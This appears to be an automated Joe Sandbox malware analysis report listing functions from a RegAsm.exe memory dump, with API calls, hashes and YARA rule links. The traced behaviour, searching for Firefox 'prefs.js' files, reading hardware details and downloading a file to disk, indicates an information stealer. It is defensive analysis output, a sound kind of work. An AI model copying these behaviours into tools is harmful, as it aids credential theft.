Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$CreateObjectSingleSleepThreadWait
String ID:
API String ID: 2678630583-0
Opcode ID: 8e1d1776afbd9a22a71f00cc1e13e4711f724deee7536dfb02ff93f4a3924dc5
Instruction ID: 566a806ed45ed7d57017c216d34a8c4ffee44fa122edaa9fab7e1248d97843d8
Opcode Fuzzy Hash: 8e1d1776afbd9a22a71f00cc1e13e4711f724deee7536dfb02ff93f4a3924dc5
Instruction Fuzzy Hash: 2E315E75901248EFCB01EFE5C985ADEBBB8FF15304F10452BF912A7281DB786A88CB54

Function 00410C00 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042784C), ref: 00410C14
HeapAlloc.KERNEL32(00000000,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042784C,00000000,?), ref: 00410C1B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 00410C39
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 00410C55

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: a3efb0290534fed42956b3759a871576bf8bd94dfe04cecd53c755e9a7ae7a27
Instruction ID: efee1238177d1e62ffebd9e5451e91450718c70c7da02a0731e5fcf44662af9a
Opcode Fuzzy Hash: a3efb0290534fed42956b3759a871576bf8bd94dfe04cecd53c755e9a7ae7a27
Instruction Fuzzy Hash: 64F05E79240204FFFB105B90EE0EFAA7F7EEB4AB04F101024F701EA1A0D7B199909B60

Function 00402308 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040238D

Strings

6%@, xrefs: 0040242C, 00402420
6%@, xrefs: 00402312, 0040231B

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 6%@$6%@
API String ID: 0-3369382886
Opcode ID: 920e5108120121350582ecc535b242215f59501578f0843988e976ed812f419f
Instruction ID: 85184098a441143994ddd9e9821d7a0cbd4c96e680ae7f57629a95d14e4869ef
Opcode Fuzzy Hash: 920e5108120121350582ecc535b242215f59501578f0843988e976ed812f419f
Instruction Fuzzy Hash: 014124715006199FCB01CF69D8806EDBBA1FF89318F1484BADD55EB391C27869828B54

Function 0041310F Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00413114

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2

Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4

Strings

B, xrefs: 004139A0

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
String ID: B
API String ID: 1244342732-1255198513
Opcode ID: 8814104713a5359509c69fafaa93134142e4c2b69244bb657f1e51804ccee6cb
Instruction ID: 59e248d9ab1f70b61ff4e3718412ae05cd91961b7bb0589921f313693a55ba95
Opcode Fuzzy Hash: 8814104713a5359509c69fafaa93134142e4c2b69244bb657f1e51804ccee6cb
Instruction Fuzzy Hash: 2252933090528DEEDF09E7E4C955BDDBBB46F19308F10419EE445632C2DBB82B88DB66

Function 0040C544 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040C549

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040C0F8: _EH_prolog.MSVCRT ref: 0040C0FD
Part of subcall function 0040C0F8: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00426FC0,?,?,00426C9E,?,00000000,?), ref: 0040C17C
Part of subcall function 0040C0F8: StrCmpCA.SHLWAPI(?,00426FC4,?,00000000,?), ref: 0040C1A0
Part of subcall function 0040C0F8: StrCmpCA.SHLWAPI(?,00426FC8,?,00000000,?), ref: 0040C1BA
Part of subcall function 0040C0F8: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00426FCC,?,?,00426C9F,?,00000000,?), ref: 0040C256

Strings

\..\, xrefs: 0040C611

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$Filelstrcat$AttributesFindFirstFolderPathlstrlen
String ID: \..\
API String ID: 3962007143-4220915743
Opcode ID: 972936fd4ca28be990a2c1efe6d580bd0263635e134d0897410b594295188a3c
Instruction ID: 2e5ccd1417ed516fe774db8f5d88769767b5b31b0c0a0e1711a7f23a3da91977
Opcode Fuzzy Hash: 972936fd4ca28be990a2c1efe6d580bd0263635e134d0897410b594295188a3c
Instruction Fuzzy Hash: B1A19371C00249EACF04FBE5C956BDDBFB4AF19308F14415EE455632C2DBB82788CAA6

Function 004068A6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,004069D5), ref: 00406925

Strings

, xrefs: 004068F8

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 2071e6830b414a4f6cef92ce782cc4aedde8b680b170233ca3d758ebf0a37cf1
Instruction ID: 2bb437bd1ab98ec78e1b4bc8873721ae5078494fa6c4fcc2ce59f946fd7ad518
Opcode Fuzzy Hash: 2071e6830b414a4f6cef92ce782cc4aedde8b680b170233ca3d758ebf0a37cf1
Instruction Fuzzy Hash: C111C1B2505219EBEB20DF88C9447AAB3E4FB04340F214426DA43E76C0DB38DE65EB59

Function 00411B09 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Strings

lB, xrefs: 00411B36

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID: lB
API String ID: 1699248803-3047919755
Opcode ID: 1ae8f98ee9e729e1ddff228a959d1a35324e12a5528342133f23c9e6784e87e3
Instruction ID: 6d156bbd15641d4f05e1eec19e6e07659e45023dd103e522504a723fedf63199
Opcode Fuzzy Hash: 1ae8f98ee9e729e1ddff228a959d1a35324e12a5528342133f23c9e6784e87e3
Instruction Fuzzy Hash: 3EF01C7991014CABDB11DF64C8909EDB7FDEBC4704F0081A6E90593280D630AF469F50

Function 0041128A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0041129B

Strings

Unknown, xrefs: 004112AE

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: d286955b6b6d2818e5943dc477cbecc87358c8a6ca35039e00e2229326ca538d
Instruction ID: 2b952d0626d81962cc3d2d1ea7a3e6cd08e9a3b4f271edb1dc8cbbe1ffc1582d
Opcode Fuzzy Hash: d286955b6b6d2818e5943dc477cbecc87358c8a6ca35039e00e2229326ca538d
Instruction Fuzzy Hash: 99E08C30A00208ABCB10DFA4E885FE977BC6B04348F504016ED01E2180DA78E64A8B69

Function 1B6B04D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

failed to allocate %u bytes of memory, xrefs: 1B6B04E7

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: failed to allocate %u bytes of memory
API String ID: 0-1168259600
Opcode ID: c7664f8e2f4503e1152f4ca5d59101a784271de759b8033640b986b60141fc0f
Instruction ID: ebf42fd3e60c064533bee3aa66fa97190ca4707749fa11b5c13556e77caa8eda
Opcode Fuzzy Hash: c7664f8e2f4503e1152f4ca5d59101a784271de759b8033640b986b60141fc0f
Instruction Fuzzy Hash: DBD012A6E89322A3CE121690BC02ACE7E514BB46A1F064034FD8C5A320D565AD9183D6

Function 00411B55 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E

Strings

;?A, xrefs: 00411B61

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: ;?A
API String ID: 3494564517-2390394969
Opcode ID: a3a0059e95a87a9fcc8fc8a6337827a09b0dfb723fb73be33f2118c884aa4573
Instruction ID: c44edc91172df6a2d8209c5a0fcd147b768fef4e3eedf00798d2b23ed28c33c3
Opcode Fuzzy Hash: a3a0059e95a87a9fcc8fc8a6337827a09b0dfb723fb73be33f2118c884aa4573
Instruction Fuzzy Hash: F1F0E53A7456245B87224F1D88009ABBB6ADBC6F71708815BEF489B328E935EC8146E4

Function 00411AC5 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411ACA
GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFileH_prolog
String ID:
API String ID: 3244726999-0
Opcode ID: a7baa9448075d694253ad54aa70fb5df7ed32d610110c51e88affe5f5644873c
Instruction ID: 66564002f8fcbdb34db8f758fad317d469f1b10f1c834de6712175aca51a9515
Opcode Fuzzy Hash: a7baa9448075d694253ad54aa70fb5df7ed32d610110c51e88affe5f5644873c
Instruction Fuzzy Hash: D3E09231A01124ABCB04DFA4C9452CDB720EF117A4F10820AE923E22E0EB384E81CE84

Function 00406590 Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00406992,00000000,00000000), ref: 004065EF
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00406992,00000000,00000000), ref: 0040661B

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 62af60d5be89a0596f68d47936175bdc582ebf75dcd0c2a45f785f654d032215
Instruction ID: ddf1fed1729771b343b2ee6822016c73bc61a629061e7931cd77314999066227
Opcode Fuzzy Hash: 62af60d5be89a0596f68d47936175bdc582ebf75dcd0c2a45f785f654d032215
Instruction Fuzzy Hash: 2D21C071600704ABC724CFB4CC81BABBBE5AB51314F24082EE61BE73D0D679E9408718

Function 0040E080 Relevance: 1.7, APIs: 1, Instructions: 221COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E085

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040B528: _EH_prolog.MSVCRT ref: 0040B52D

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID:
API String ID: 2625060131-0
Opcode ID: d3b388acb8e52f8f0e9a798c99727d10bb19b90952e1e5c6d4f07461b432e805
Instruction ID: 92344c9dd13ccb461941bb84c380d939bf438741553a66a02b1f5b3ac02e0490
Opcode Fuzzy Hash: d3b388acb8e52f8f0e9a798c99727d10bb19b90952e1e5c6d4f07461b432e805
